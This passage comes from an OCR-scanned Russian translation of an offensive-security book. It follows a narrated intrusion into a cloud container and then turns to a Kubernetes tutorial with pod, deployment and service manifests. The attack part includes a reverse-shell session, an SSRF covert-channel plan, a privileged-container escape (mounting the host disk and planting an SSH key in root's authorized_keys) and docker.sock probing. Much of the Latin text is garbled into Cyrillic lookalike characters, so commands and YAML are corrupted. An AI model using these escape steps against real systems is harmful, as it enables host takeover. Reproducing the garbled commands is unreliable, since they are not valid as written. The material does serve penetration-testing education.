гооЁ@Роіпё1:~53ЕеЁсһег /# руЕВоп маіп.ру 
# Запуск цикла получения результатов из 53 тхгайѕ-агсһімеѕ -раскеЁѕ - пих 


#Новая цель называется 150380с41Ға4 


ѕһе11> ід 
Выполнит 14, когда жертва зарегистрируется 


Ө џіа=0(гоої) 910=0(гоої) дгоирѕ=0(гоої) 


Это заняло некоторое время, но у нас наконец-то есть работающая 
оболочка Ө в доверенной среде МХК А05. Да начнется веселье! 


АЛЬТЕРНАТИВНЫЙ МЕТОД 55ВЕ 


Мы решили пойти через бакет 53, чтобы обойти блокировку сети, 
но, если вы помните, мы уже нашли приложение, на которое не 
распространяются эти ограничения: демонстрационное прило- 
жение из главы 5. Мы могли бы отлично использовать обнару- 
женную ранее уязвимость 55ВЕ для разработки квазидуплексно- 
го канала связи, выполнив следующие шаги: 


1. Получаем внутренний ІР-адрес демонстрационного прило- 
жения через метаданные АМГ5. 

2. Находим внутренний порт, используемый демоприложени- 
ем. Запускаем несколько запросов суг\ с сайта опроса, пока не 
найдем реальный используемый порт (3000, 5000, 8080, 8000 
ПТ) 

5. Пишем программу-агент, которая постоянно просит демон- 
страционное приложение сделать скриншот нашего атакую- 
щего сервера. 
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4. Наш оператор ожидает запросов на атакующем сервере и по- 
дает команды для запуска внутри обманной НТМГ-страницы. 


5. Агент извлекает команды и отправляет ответ в параметре 
ОВГ, опять же через демонстрационное приложение. 


6. Оператор получает ОВТ-адрес и распечатывает вывод. 


Я предпочел сосредоточиться на сценарии 53, потому что он 
гораздо более доступен и, вероятно, окажется более полезным 
в реальной жизни. 


Попытка вырваться на свободу 


Наконец-то мы заполучили желанный сервер внутри УРС МХК Ад$, 
и унас есть гоо{-доступ ... или нет? Кто-нибудь еще в наши дни запус- 
кает приложения под гоо{? Скорее всего, мы на самом деле просто 
внутри контейнера, и пользователь «гос в этом пространстве имен 
сопоставляется с каким-то случайным непривилегированным иден- 
тификатором пользователя на хосте. 

Быстрый способ подтвердить нашу гипотезу – более внимательно 
изучить процесс с номером РІ” 1: изучить его атрибуты командной 
строки, контрольные группы и смонтированные папки. Мы можем 
найти эти данные в папке /ргос – виртуальной файловой системе, 
в которой хранится информация о процессах, дескрипторах файлов, 
параметрах ядра и т. д. (см. листинг 6.6). 


Листинг 6.6. Список атрибутов процесса с РІР 1 в папке /ргос 


ѕһе11> 1а 
иід=0(гоої) 919=0 (гоо) дгоирз=0(гоо{) 


ѕһе11> саї /ргос/1/ста1іпе 
/Біп/5ћ 


ѕһе11> са /ргос/1/сдгочр 

11: геехег : /доскег/5еа7Ь366947143ай8ЬҒе4с58с65ЬЬЬ7Ь541 
10:61Ккіо: /Ооскег/5еа7Ь366917193ай8ЬҒе4с58с656ЬЬ7Ь5414с 
9:сриѕеї: /босКег/5еа76365997193а9851е4с58с65556765414с 
- -Сокращено- - 


ѕһе11> са /ргос/1/тоџпіѕ 
омег1ау / оуег1ау гм, геТа ме , Іонегаіг=/уаг/116/роскег /оуег1ау2 /1/6С0К4072 ЈКЕМТОГСІКЅЕ5ХС6НЅ 


Мы могли бы продолжать, но из упоминания "РосКег в именах конт- 
рольных групп и точках монтирования ясно, что мы застряли внут- 
ри контейнера. Кроме того, в типичной современной системе Піпих 
команда, запускающая первый процесс, должна выглядеть как /ѕБіп/ 
ілі или /иѕг/146/ѕуѕёета, а не /Біп/ѕћ. 
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Имейте в виду, что наличие гоої внутри контейнера по-прежне- 
му дает нам возможность устанавливать пакеты и получать доступ 
к защищенным файлам, но мы можем применять эту власть только 
к ресурсам, принадлежащим нашему узкому и очень ограниченному 
пространству имен. 

Один из самых первых рефлексов хакера при проникновении в кон- 
тейнер – проверить, работает ли он в привилегированном режиме. 


Проверка привилегированного режима 


В привилегированном режиме выполнения РосКег просто действует как 
среда упаковки: он поддерживает изоляцию пространства имен, но 
предоставляет широкий доступ ко всем файлам устройства, таким 
как жесткий диск, а также ко всем возможностям Шпих (подробнее об 
этом в следующем разделе). 

Таким образом, контейнер может изменять любой ресурс в хост-си- 
стеме, например функции ядра, жесткий диск, сеть и т. д. Если мы об- 
наружим, что находимся в привилегированном режиме, мы можем 
просто смонтировать основной раздел, вставить ключ $5Н в любую 
домашнюю папку и открыть новую оболочку администратора на хос- 
те. Вот быстрая иллюстрация этой идеи на лабораторной машине: 


# Демонстрационная лаборатория 
гоої@ретоСопёаіпег : /# 1$ /еу 


аџЁоЁѕ Ктѕ9 ррр 1+у10 
Ьѕ9 119һёпут рзаих {611 
--5пір- - 


# (Ку-устройства обычно отфильтровываются контрольными группами, поэтому мы должны 
находиться внутри привилегированного контейнера 


гооє@ретоСопёаіпег : /# Е41$К -1 

ріѕк /4е\у/9т-0: 23.3 САВ, 25044189184 Буфез, 48914432 зесфог5 
Џпі5: зесфог$ оЁ 1 * 512 = 512 Буёеѕ 

- -5П\р- - 


# монтируем основной раздел хоста 
гоої@ретоСопёаіпег : /# моупе /4е\у/9т-0 /мпЕ && 15 /тпЁ 
Біп деу Һоме 116 105$%4+Роип@ мп ргос... 


# вставляем наш ключ 55Н в корневую домашнюю папку 
гоої@ретоСопёаіпег : /# есһо "<5һ-гѕа ААААВЗМ2аС1ус2ЕА..." > /тпё/гооЁ/.ѕ5һ/аџёһогіғед Кеуѕ 


# получаем ІР хоста и подключаемся по 55Н 
гооє@ретоСоп+аіпег : /# 55ћ гоо @172.17.0.1 
гооё@ћоѕі: /# 


578] Непривилегированный пользователь, даже находя- 
щийся внутри привилегированного контейнера, не сможет легко выйти 
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из него, используя эту технику, поскольку команда тоцп* не будет рабо- 
тать. Ему нужно будет сначала повысить свои привилегии или атако- 
вать другие контейнеры на том же хосте, например которые раскры- 
вают порты. 


Казалось бы, никто не додумается запустить контейнер в привиле- 
гированном режиме, особенно в производственной среде, но жизнь 
полна сюрпризов, и кому-то это может понадобиться. Возьмем, к при- 
меру, разработчика, которому нужно настроить такую простую вещь, 
как значение тайм-аута ТСР (опция ядра). Чтобы сделать это, разра- 
ботчик, естественно, просмотрел документацию ПоскКег и наткнулся 
на флаг ѕуѕсї1, который, по сути, запускает команду 5узс 1 из кон- 
тейнера. Однако при запуске эта команда, конечно, не сможет изме- 
нить параметр тайм-аута ТСР ядра, если только она не будет запуще- 
на в привилегированном режиме. Тот факт, что перевод контейнера 
в привилегированный режим представляет собой угрозу безопасно- 
сти, даже не придет этому разработчику в голову, ведь зу$с 1. – это 
официальный и поддерживаемый флаг, описанный в документации 
РосКег, ради всего святого! 


Возможности Шіпих 


Теперь мы можем вернуться к нашему приложению для опроса, что- 
бы проверить, можем ли мы нарушить изоляцию пространства имен. 
Мы запрашиваем список содержимого папки / еу, но в результате от- 
сутствуют все классические файлы псевдоустройств, такие как *%у*, 
$Да и мет, подразумевающие привилегированный режим. Некоторые 
администраторы обменивают привилегированный режим на список 
индивидуальных разрешений или возможностей (сара И). Вы мо- 
жете рассматривать возможности как подробную разбивку разреше- 
ний, которые в тих традиционно приписывали всемогущему при- 
вилегированному пользователю гоо+. Пользователю с полномочиями 
САР_МЕТ_АОМТМ будет разрешено выполнять корневые операции в сете- 
вом стеке, такие как изменение ІР-адреса, привязка к нижним портам 
и вход в неразборчивый режим для прослушивания трафика. Однако 
пользователю будет запрещено, например, монтировать файловые 
системы. Для этого действия требуется возможность САР_5\5_АОМТМ. 


ШЗ 198 Можно сказать, что возможность САР_5Ү5 АРМІМћ яв- 
ляется аналогом гоо*, учитывая количество предоставляемых ею при- 
вилегий. 


По указанию владельца контейнера в виде флага - -а44-сар Ооскег 
может добавить к контейнеру дополнительные возможности. Неко- 
торые из этих мощных возможностей можно использовать для нару- 
шения изоляции пространства имен и доступа к другим контейнерам 
или даже для компрометации хоста путем перехвата пакетов, направ- 
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ляемых в другие контейнеры, загрузки модулей ядра, выполняющих 
код на хосте, или монтирования файловых систем других контейне- 
ров. 

Мы перечисляем текущие возможности контейнера ѕигуеуѕарр, 
просматривая файловую систему /ргос, а затем декодируем их 
в осмысленные разрешения с помощью инструмента сарѕћ: 


ѕһе11> са /ргос/ѕе1Ғ/ѕЁаёиѕ |9гер Сар 

СарІпһ: 00000000а80425#Ь 

СарРгт: 00000000а80425#Ь 

СарЕғҒ: 00000000а80425#Ь 

СарВпа: 00000000а80425#Ь 

СарАть: 0000000000000000 

гоої@Воцпсег : /# сарѕћ - -йесойе=00000000а80425#Ь 
0х00000000а80425Ғ=сар сһомп ,сар_дас_оуеггійе ,сар_Ғомпег ,сар_Ёѕеііа 
„сар КіЛЛ,сар ѕеідіа,сар ѕеёџій, сар ѕеЁрсар,... 


Действующими и разрешенными возможностями нашего текущего 
пользователя являются СарРгм и СарЕ#+, представляющие собой обыч- 
ный набор разрешений, которые мы можем ожидать от гоо* внутри 
контейнера: уничтожение процессов (САР_КІЃ), изменение владель- 
цев файлов (САР_СНОММ) и так далее. Все эти операции жестко ограни- 
чены текущим пространством имен, поэтому мы еще не выбрались 
из клетки. 


НЕОДНОЗНАЧНОСТЬ ВОЗМОЖНОСТЕЙ 


Возможности могут быстро превратиться в проблему, особенно 
в части того, как они обрабатываются во время выполнения. Ког- 
да порождается дочерний поток, ядро назначает ему несколько 
списков возможностей, наиболее важными из которых являют- 
ся наборы эффективных (СарЕТР) и разрешенных (СарРгт) воз- 
можностей. СарЕ#Ғ содержит собственные разрешения, которые 
могут быть применены сразу же, в то время как возможность 
в СарРгм может использоваться только после системного вызо- 
ва сарзе{, который специально получает эту привилегию (сарѕеї 
устанавливает соответствующий бит в СарЕ{Р). 


СарРгм представляет собой сумму трех входов: 


• общие возможности, обнаруженные как в наследуемых воз- 
можностях (СарІпћ) родительского процесса, так и в наследу- 
емых возможностях соответствующего файла на диске. Эта 
операция выполняется через побитовое И, поэтому, напри- 
мер, файл без возможностей обнуляет этот ввод; 


• разрешенные возможности (СарРгт) исполняемого файла, 
если они входят в максимальный набор возможностей, раз- 
решенных родительским процессом (СарВпд); 
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• внешние возможности родительского процесса (СарАпБ). Ро- 
дительский процесс выбирает соответствующие возмож- 
ности из своих СарРгм и СарІпћ и добавляет их в список Са- 
рАмЬ для передачи дочернему процессу. СарАтЬ существует 
только как уловка, позволяющая «обычным» сценариям без 
каких-либо файловых атрибутов наследовать некоторые воз- 
можности вызывающей программы. Другими словами, даже 
если первый вход из этого перечня обнулен, родитель все еще 
может передать своим дочерним элементам наследуемые или 
разрешенные возможности. Если у исполняемого файла есть 
возможности, этот третий ввод игнорируется. 


Список СарЕЁ# дочернего элемента равен его СаррРгп, если в файле 
установлен бит еЁҒесїіме; в противном случае он перекрывается 
СарАмЬ. Наследуемые возможности (СарїІпћ) и ограниченные воз- 
можности (СарВпф) передаются дочернему процессу как есть. 


Прежде чем вы начнете заряжать свой дробовик, чтобы при- 
стрелить меня, знайте, что я написал это только для того, чтобы 
продемонстрировать, насколько сложно определить набор воз- 
можностей, назначенных новому процессу. Я призываю вас глуб- 
же погрузиться в тему и узнать, как использовать возможности 
контейнеров. Вы можете начать с отличного введения Адриана 
Муата «Возможности Шпих: почему они существуют и как они 
работают» на И#р5.//Ь109.сотатег-зошНоп5.сот/ и официальной 
страницы руководства ядра Шпих по возможностям в разделе 7 
һіірѕ//тапл.огд/. 


Сокет ВосКег 


Дальше мы ищем файл /маг/гип/оскег.ѕосК, который представляет 
собой КЕЅТ АРІ, используемый для связи с демоном Роскег на хосте. 
Если мы сможем получить доступ к этому сокету изнутри контейнера, 
используя, например, простой сиг 1, мы можем указать ему запустить 
привилегированный контейнер, а затем получить доступ уровня гоої 
к хост-системе. Начнем с проверки наличия роскег.ѕосК: 


ѕһе11> сиг1 --ипіх-ѕоскеЁ /маг/гип/роскег.ѕоск Вр: //Лоса\Во${ /1маде$ /)зоп 
сиг: (7) Соџ1ап' соппесЕ Ёо зегуег 


ѕһе11> 15 /маг/гип/роскег.ѕоск 
15: саппоф ассеѕѕ ' /маг/гип/роскег.ѕоск': № ѕисһ ҒіЛе ог фігесЁогу 


ѕһе11> тоџпё | дгер роскег 
# Ооскег.ѕоск не найден 


Здесь нам не повезло. Мы проверяем версию ядра, надеясь, что на 
хосте работает версия, в которой есть какие-то задокументирован- 
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ные эксплойты, но мы снова ошибаемся. На машине работает ядро 
4.14.146, которое на момент запуска всего на пару версий отстает от 
последней версии: 


ѕһе11> ипаме -а 
ІАпих #1а7а6#60915 4.14.146-119.123.ат7п2.х86_64 #1 


В общем, мы работаем как относительно беспомощный пользова- 
тель гоо на современной машине без каких-либо очевидных непра- 
вильных конфигураций или эксплойтов. Мы всегда можем настроить 
аналогичное ядро в лаборатории, а затем углубиться в структуры па- 
мяти и системные вызовы, пока не найдем уязвимость нулевого дня, 
чтобы нарушить изоляцию пространства имен, но давайте оставим 
это на крайний случай. 

Первым побуждением любого здравомыслящего человека, запер- 
того в клетке, является попытка вырваться на свободу. Это благо- 
родное чувство. Но если мы можем достичь наших самых коварных 
целей, находясь за решёткой, зачем вообще тратить время на распи- 
ливание прутьев? 

Конечно, было бы здорово выбраться на хост и, возможно, изучить 
другие контейнеры, но, учитывая текущую обстановку, я считаю, что 
пришло время отступить от зарешеченного окна, отбросить бесполез- 
ную тупую пилку и вместо этого сосредоточиться на более широкой 
картине. 

Забудьте о том, чтобы избавиться от оков этого единственного ни- 
чтожного хоста. Как насчет того, чтобы разрушить весь этаж - нет, все 
здание - одним ударом? Вот это был бы достойный результат. 

Помните, как мы недавно выгружали переменные среды в разде- 
ле «Выполнение произвольного кода»? Мы подтвердили уязвимость 
внедрения шаблона и сосредоточились на переменных, связанных 
с Ојапро, потому что это была основная задача, но если вы присмот- 
ритесь, то, возможно, мельком увидите что-то гораздо более важное. 
Что-то гораздо более грандиозное. 

Позвольте мне еще раз показать вам вывод: 


ѕһе11> епу 

РАТН=/иѕг/Лоса1 /Біп: /иѕг/Лоса1 /ѕБіп: /иѕг/Лоса1 /Біп: /иѕг/ѕБіп: /иѕг/Біп: /ѕБіп: /БАп 
НОМЕ= /гооё 

КОВЕАМЕТЕЅ_ЅЕАМІСЕ РОВТ НТТР5=443 

КОВЕВМЕТЕ$_РОВТ_443_ТСР_РОВТ=443 

КОВЕВМЕТЕ$_РОВТ_443_ТСР=Еср://10.100.0.1:443 

- - Сокращено- - 


Мы работаем внутри контейнера, управляемого кластером Ки- 
Бегпеез$! Не обращайте внимания на эту одинокую, ограниченную 
рабочую машину; у нас есть шанс повергнуть в руины целое коро- 
левство! 
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Дополнительные ресурсы 


Вигр известен своим активным сканером, который автоматизиру- 
ет большую часть этапа разведки параметров. В качестве альтер- 
нативы вы можете попробовать некоторые расширения, которые 
проверяют различные уязвимости. 5поору Ѕесигіќу предлагает ин- 
тересную подборку таких расширений по адресу ћіїрѕ;//9йћир.сот/ 
5поорузесигЙу/ауиезоте-Бигр-ежеп$!оп5/. 


Ознакомьтесь с докладом Джеймса Кеттла «Внедрение шаблонов 
на стороне сервера: ВСЕ для современного веб-приложения», что- 
бы узнать о различных методах применения эксплойтов: И#р5./ 
имимуоиире.сот/масй?у=3сТдиЕТУ8 75. 

Справочник по роскКег доступен по адресу ћі1рѕ;//оски.1у/259аућ/. 
Отличная статья о взломе контейнера - «Путь к корню: побег из 
контейнера с использованием эксплойта ядра», в которой Нимрод 
Столер использует СУЕ-20177308 для выхода из изоляции: ћіір;//р1ї. 
/2ТЕНУТ. 

Описания других эксплойтов вы найдете на ћіїрѕ;//ипі42.ра!Іоа!їопеї- 
М/ОГК$.СОТИ. 


ЗА КУЛИСАМИ 


Возможно, вы следите за новейшими и самыми модными 
технологиями, как только они появляются на рынке. 
Вероятно, вы слишком заняты опустошительными на- 
бегами на домены Міпӣомѕ, чтобы идти в ногу с послед- 
ними тенденциями за пределами вашей ниши. Но незави- 
симо от того, жили ли вы последние пару лет как изгой или 
ездили с одной конференции на другую, до вас наверняка доходили 
слухи о каком-то волшебном новом звере по имени Киђегпеїеѕ, иде- 
альном оркестраторе контейнеров и решении для развертывания. 

Фанатики Кибегпеїеѕ скажут вам, что эта технология решает все са- 
мые большие проблемы администраторов и ОеуОрз. Что она просто 
работает из коробки. Это магия, утверждают они. Ну да, ну да... на- 
деньте на неопытного человека костюм-крыло, укажите на крошеч- 
ную полянку далеко у подножия горы, столкните его с края пропасти 
и посмотрите, долетит ли он до цели. Кибегпеѓеѕ - это не волшебство. 
Это сложно. Это запутанные спагетти из диссонирующих ингреди- 
ентов, каким-то образом переплетенных друг с другом и связанных 
злейшими врагами всего сущего: ірёаБ1еѕ и О№. 

Скорее, это большой кусок вкусного пирога для хакеров. Коман- 
де очень талантливых разработчиков потребовалось целых два года 
после первого общедоступного релиза, чтобы внедрить функции 
безопасности. Можно спорить об их понимании приоритетов, но 
я, например, им благодарен. Если в 2017 году квалифицированные 
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высокооплачиваемые инженеры разрабатывали АРІ без аутентифи- 
кации и небезопасные системы, кто я такой, чтобы спорить? Я вам 
очень благодарен, ребята. 

Несмотря на это, я считаю, что Кибегпеѓеѕ – мощная и революцион- 
ная технология. Очевидно, что она пришла надолго, и у нее настолько 
огромный потенциал, что я чувствую себя обязанным хотя бы вкрат- 
це рассказать о ее внутреннем устройстве. Если вам уже довелось раз- 
ворачивать кластеры с нуля или написать свой собственный контрол- 
лер, вы можете пропустить эту главу. 

В ином случае держитесь рядом. Возможно, вы не станете экспер- 
том по Кибегпеѓеѕ, но вы будете знать достаточно, чтобы взломать 
систему на этой платформе, я вам обещаю. 

Хакеров не устраивают «магические» аргументы. Мы разберем 
технологию Киђегпеќеѕ на части, изучим ее компоненты и научимся 
выявлять некоторые распространенные неверные конфигурации. Ар- 
хитектура МХВ А45 станет для нас идеальным учебным полигоном. 
Наберитесь сил, мы идем взламывать Кибегпеѓеѕ! 


Обзор Кибегпеѓеѕ 


Кођегпеѓеѕ - это ответ на вопрос: «Как мне эффективно управлять 
тысячей контейнеров?» Если вы немного поиграете с контейнерами 
в инфраструктуре, которую мы настроили в главе 5, вы быстро столк- 
нетесь с некоторыми разочаровывающими ограничениями. Напри- 
мер, чтобы развернуть новую версию образа контейнера, необходимо 
изменить пользовательские данные и перезапустить или развернуть 
новую машину. Вы только подумайте: чтобы сбросить несколько про- 
цессов – операция, которая должна занять всего несколько секунд, – 
вам нужно выделить совершенно новую машину. Точно так же един- 
ственный способ динамически масштабировать среду - скажем, если 
вы хотите удвоить количество контейнеров, - это увеличить коли- 
чество компьютеров и скрыть их за балансировщиком нагрузки. Наше 
приложение поставляется в контейнерах, но мы можем действовать 
только на уровне машины. 

Кибегпе{ез решает эту и многие другие проблемы, предоставляя 
платформу для эффективного запуска, управления и планирования 
контейнеров на нескольких компьютерах. Хотите добавить еще два 
контейнера №ріпх? Без проблем. Это буквально одна команда: 


гооЁ@ретогаБ : /# КиБесЕ\ ѕса1е --герАса$=3 йер1оутепё/пдіпх 


Хотите обновить версию контейнера №іпх, развернутого в рабочей 
среде? Теперь нет необходимости перераспределять машины. Просто 
попросите Киђегпеѓеѕ развернуть новое обновление без простоев: 


гоої@ретогаБ: /# КиБесЕ1 зе{ ітаде йер1оумепё/пдіпх-ер1оумеп\пдіпх=пдіпх:1.9.1 - -гесогі 
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Хотите немедленно получить доступ к командной оболочке для 
контейнера номер 7545, работающей на машине 1-162ас87е65115 где- 
то в УРС урс-695е4Ъ4{? Забудьте о получении ІР-адреса хоста, внедре- 
нии закрытого ключа, 5$Н, команде росКег ехес и так далее. Это вам не 
2012 год! Достаточно простой команды КиБес* 1 ехес с вашего ноутбука: 


гооі@ретоГаб : /# КиБесЕ\1 ехес зрагс\ом/пд\пх-7543 Баѕһ 
гоої@ѕрагсҒом/пдіпх- 7543: /# 


ИО 138 Конечно, для наглядности я сделал некоторые сокра- 
щения. Нужно иметь рабочие учетные данные, доступ к серверу АРІ 
и соответствующие разрешения. Подробнее об этом позже. 


Неудивительно, что эта чудо-машина для исполнения желаний по- 
корила сердца и головы каждого в сообществе ОеуОрз. Она элегант- 
на, эффективна и до недавнего времени была очень небезопасна! 
Помнится, всего пару лет назад вы могли просто указать один ОВГ- 
адрес и выполнить все вышеупомянутые действия и многое другое 
без аутентификации. Тук-тук... входите, не заперто. И это была только 
одна точка входа; три другие предоставляли аналогичный доступ. Это 
были суровые времена. 

Однако за последние два года или около того в Киђегпеѓеѕ было 
реализовано множество новых функций безопасности, от управления 
доступом на основе ролей до сетевой фильтрации. Хотя некоторые 
компании все еще используют кластеры версии старше 1.8, большин- 
ство из них применяют достаточно свежие версии, поэтому мы возь- 
мемся за полностью исправленный и усиленный кластер Кибегпеез, 
чтобы не отрываться от жизни. 

В оставшейся части этой главы я буду исходить из того, что у нас 
есть набор из сотни машин, любезно предоставленных А\М$, кото- 
рые полностью подчинены прихоти и безрассудству КиБегпеез. Все 
это формирует то, что мы обычно называем кластером Киђегпеїезѕ. 
Сначала мы поиграем с некоторыми рудиментарными командами, 
а затем разберем технологию целиком, так что пока наслаждайтесь 
отрывочной информацией в следующих нескольких абзацах. Не вол- 
нуйтесь, все сойдется в конце концов. 


Если вы хотите продолжить вместе со мной, я реко- 
мендую вам бесплатно загрузить кластер Кирегпе!е$ с помощью Міпі- 
Кире (һі1рѕ://тіпікире.ѕ5195.К85.10/40сѕ/51агі/). Это инструмент, который 
запускает одноузловой кластер на УтиаВох/КУМ (виртуальная маши- 
на на основе ядра) и позволяет вам экспериментировать с командами. 


Знакомство с подами 


Наше путешествие в Кибегпеѓеѕ начинается с контейнера, на котором 
запущено приложение. Это приложение сильно зависит от второго 
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контейнера с небольшой локальной базой данных для ответа на за- 
просы. Вот где на сцену выходят поды (рой, стручок). Под - это, по 
сути, один или несколько контейнеров, рассматриваемых КиБбегпеѓеѕ 
как единое целое, как стручок с горошинами внутри. Все контейнеры 
внутри пода будут планироваться вместе, запускаться вместе и завер- 
шаться вместе (рис. 7.1). 

Наиболее распространенный способ вашего взаимодействия с Ки- 
Бегпетез – отправка файлов манифеста. Эти файлы описывают же- 
лаемое состояние инфраструктуры, например какие модули должны 
работать, какой образ они используют, как они взаимодействуют друг 
с другом и т. д. Все в Кибегпеез вращается вокруг этого желаемого 
состояния. На самом деле главная миссия Киђегпеѓеѕ – сделать желае- 
мое состояние реальностью и сохранить его таким. 


Роа 


Рис. 7.1. Под, состоящий из контейнеров №іпх и Вейіѕ 


В листинге 7.1 мы создаем файл манифеста, который под меткой 
арр: муарр формирует под, состоящий из двух контейнеров: сервера 
М№еіпх, прослушивающего порт 8080, и базы данных Кейіѕ, доступной 
через порт 6379. Синтаксис УАМГ, для описания этой конфигурации 
выглядит так: 


Листинг 7.1. Файл манифеста для создания пода, состоящего 
из двух контейнеров 


# Файл муарр.уат. 

# Минимальная конфигурация для запуска пода из двух контейнеров 
арімегѕіоп: м1 

Кіпа: Роа # Мы хотим развернуть под 


пеайаѓа: 
паме: муарр # Имя пода 
1ађБе15: 
арр: туарр # Метка для поиска/выбора пода 
Ѕрес: 
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сопїаіпегѕ: 
- папе: пдіпх # Первый контейнер 
ітаде: ѕрагсҒ.ом/пдіпх # Имя общедоступного образа 
рогіѕ: 
- сопіаіпегРог: 8080 # Порт на ІР-адресе пода 
- пате: мудЬ # Второй контейнер 
1маде: гедіѕ # Имя общедоступного образа 
рогЁѕ: 
- сопёаіпегРогї: 6379 


Мы отправляем этот манифест с помощью утилиты КиБес{ 1 – флаг- 
манской программы, используемой для взаимодействия с кластером 
Кибегпеѓеѕ. Вам нужно скачать КиБес 1 с ћіїрѕ;//Киђетеїеѕ.іо/10с5/аѕ5к5/ 
10015/іпѕїа!1-Кибесї/. 

Мы обновляем конфигурационный файл ~ /.КиБе/сопЁід, чтобы он 
указывал на наш кластер (подробнее об этом позже), а затем отправ- 
ляем файл манифеста, показанный в листинге 7.1: 


гооё@ретаБ: /# КиБесЕ\ арр1у -Ғ туарр.уалі. 


гооЁ@ретгаБ: /# КиБес+1 де ройѕ 
МАМЕ ВЕАБУ ЅТАТИЅ ВЕЗТАВТ$ АСЕ 
муарр 2/2 Киппіпо 0 1123$ 


Наш под, состоящий из двух контейнеров, теперь успешно рабо- 
тает на одной из 100 машин в кластере. Контейнеры в одном поде 
рассматриваются как единое целое, поэтому Кибегпеез использует 
для них один и тот же том и сетевые пространства имен. В результате 
наши контейнеры М№еілх и базы данных имеют один и тот же [Р-адрес 
(10.0.2.3), выбранный из пула ІР-адресов сетевого моста (дополни- 
тельную информацию об этом см. в разделе «Ресурсы»), и могут об- 
щаться друг с другом, используя их изолированный от пространства 
имен адрес 1оса1ћоѕї (127.0.0.1), как показано на рис. 7.2. Это доволь- 
но удобно. 


На самом деле Киретеѓеѕ порождает внутри пода 
третий контейнер, который называется раџѕесопёаіпег. Этот кон- 
тейнер владеет пространствами имен сети и тома и разделяет их 
с остальными контейнерами в поде (подробнее об этом рассказано на 
сайте һіїрѕ /Луүүуү.іапіеуіѕ.ога/). 


У каждого пода есть ІР-адрес, и он живет на виртуальной машине 
или «пустой» машине, называемой узлом. Каждая машина в нашем 
кластере является узлом, поэтому в кластере 100 узлов. На каждом 
узле размещается дистрибутив Шпих с некоторыми специальны- 
ми инструментами и программами Киђегпеѓеѕ для синхронизации 
с остальной частью кластера. 

Один под - это хорошо, но два лучше, особенно для устойчивости, 
чтобы второй мог выступать в качестве резервной копии в случае сбоя 
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первого. Что нам делать? Отправить один и тот же манифест дважды? 
Нет, мы создаем объект развертывания (аероутепе објесї), который 
может реплицировать модули, как показано на рис. 7.3. 


ІР 10.0.2.3 


сЬгӨ: 10.0.0.0/16 
еїһӘ: 192.168.1.23 
12 


ІР 10.0.2.3 


Рис. 7.2. Сетевая конфигурация модуля, контейнеров и хост-машины (узла) 


Развертывание 


Кер14саѕ: 2 


Ѕе1есїог: муарр 


Рой туарр Рой туарр 


рогі 8080 рогі 6379 рогі 8080 рогі 6379 


Рис. 7.3. Объект развертывания Киђегтеїеѕ 


Развертывание описывает, сколько модулей должно работать в лю- 
бой момент времени, и контролирует стратегию репликации. Оно бу- 
дет автоматически возрождать модули, если они выйдут из строя, но 
его ключевой особенностью является чередование обновлений. На- 
пример, если мы решим обновить образ контейнера и, таким образом, 
отправим обновленный манифест развертывания, развертывание 
стратегически заменит модули, гарантируя постоянную доступность 
приложения в процессе обновления. Если что-то пойдет не так, новое 
развертывание откатится к предыдущей версии нужного состояния. 
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Давайте удалим наш предыдущий автономный модуль, чтобы вмес- 
то этого мы могли воссоздать его как часть объекта развертывания: 


гооє@ретоГаБ: /# КибесЕ\ де\ефе -Р пуарр.уат1. 


Чтобы создать под как объект развертывания, мы отправляем но- 
вый файл манифеста типа Вер1оутепё, указываем метки контейнеров 
для репликации и добавляем конфигурацию предыдущего модуля 
в его файл манифеста (см. листинг 7.2). Поды почти всегда создаются 
как часть ресурсов развертывания. 


Листинг 7.2. Повторное создание нашего пода в качестве объекта 
развертывания 


# Файл ер1оутепЁ туарр.уамі. 
# Минимальное описание для запуска двух подов 
арімегѕіоп: аррѕ/%1 
Кіпа: рер1оутепё # Отправляем объект развертывания 
пе+адаќѓа: 
папе: муарр # Имя развертывания 
Ѕрес: 
ѕе1есіог: 
таёсһіаБе15: # Метка подов 
арр: туарр 
гер1ісаѕ: 2 # Количество подов, которые надо развернуть 
етр1аёе: # Ниже идет классическое определение пода 
пеёайаѓа: 
ТаБе1: 
арр: туарр # Метка пода 
Ѕрес: 
сопёаіпегѕ: 
- паме: пдіпх # Первый контейнер 
ітаде: ѕрагсҒ1ом/пдіпх 
рог: 
- сопёаіпегРогі: 8080 
- пате: мудЬ # Второй контейнер 
ітаде: гедіѕ 
рог: 
- сопёаіпегРогі: 6379 


Далее мы отправляем файл манифеста и проверяем детали новых 
подов развертывания: 


гооЁ@ретгаБ : /# КиБесЕ1 арр1у -Р дер1оупепё_туарр.уат1 
аер1оутепё.аррѕ/туарр сгеаїей 
гооі@ретгаБ: /# КиБес+1 де ройѕ 


МАМЕ ВЕАБУ 5ТАТОЅ ВАЕЅТААТЅ АСЕ 
туарр-7964#7-Бт6ѕ 2/2 Вупп1па 0 11385 
туарр-9Яс4еа-1+035 2/2 Виппіпая 0 1"435 
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На рис. 7.4 показаны эти два работающих пода. 


сЬгө: 10.0.0.0/16 сьг0: 10.5.0.0/16 


е{Н0: 192.168.1.23 еЁһћ0: 192.168.1.38 
То: 127.0.0.1 10: 127.0.0.1 


Рис. 7.4. Работают два пода, каждый из которых состоит 
из двух контейнеров 


Все поды и узлы, являющиеся частью одного и того же кластера Ки- 
регпеѓеѕ, могут свободно взаимодействовать друг с другом без необ- 
ходимости использования методов маскировки, таких как преобра- 
зование сетевых адресов (МАТ). Это неограниченное общение - одна 
из ключевых сетевых функций Кибегпе$. Наш под А на машине В 
должен иметь возможность связаться с подом С на машине р, сле- 
дуя обычным маршрутам, определенным на уровне машины/марш- 
рутизатора/подсети/УРС. Эти маршруты автоматически создаются 
инструментами настройки кластера Киђегпеѓеѕ. 


Балансировка трафика 


Теперь нам нужно сбалансировать трафик на эти два пода. Если один 


из них выходит из строя, пакеты должны автоматически перенаправ- 
ляться на оставшийся под, пока не будет запущен новый под. Объект, 
описывающий эту конфигурацию, называется службой и изображен 
на рис. 7.5. 


10.0.2.3 

рогі 8080 
10.100.20.3 Род 10.5.47.8 
рогі 80 ВУЕУ У роге 8080 


Рис. 7.5. Объект службы кластера 


Файл манифеста службы состоит из метаданных, добавляющих 
теги к этой службе и ее правилам маршрутизации, в которых указы- 
вается, на какие поды следует отправлять трафик и какой порт про- 
слушивать (см. листинг 7.3). 
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Листинг 7.3. Файл манифеста службы 


# Файл туѕегуісе.уаті. 
# Минимальное описание для запуска службы 
арімегѕіоп: №1 
Кіпа: Ѕегуісе # Создаем службу 
пеїадаѓа: 
пате: туарр 
1ађБе15: 
арр: муарр # Метка службы 
Ѕрес: 
ѕе1есіог: 
